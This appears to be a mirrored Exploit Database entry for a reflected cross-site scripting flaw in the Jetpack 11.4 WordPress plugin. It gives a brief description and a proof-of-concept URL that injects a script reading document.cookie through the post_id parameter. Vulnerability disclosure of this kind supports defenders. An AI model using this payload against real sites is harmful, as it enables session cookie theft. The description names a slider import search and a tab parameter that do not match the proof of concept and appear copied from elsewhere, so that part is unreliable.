Jetpack 11.4 – Cross Site Scripting (XSS)

• Exploit Database
• 30 阅读

• 作者： Behrouz Mansoori
  日期： 2023-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51104/

• # Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
  # Date: 2022-10-19
  # Author: Behrouz Mansoori
  # Software Link: https://wordpress.org/plugins/jetpack
  # Version: 11.4
  # Tested on: Mac m1
  # CVE: N/A
  
  1. Description:
  This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
  
  2. Proof of Concept:
  http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>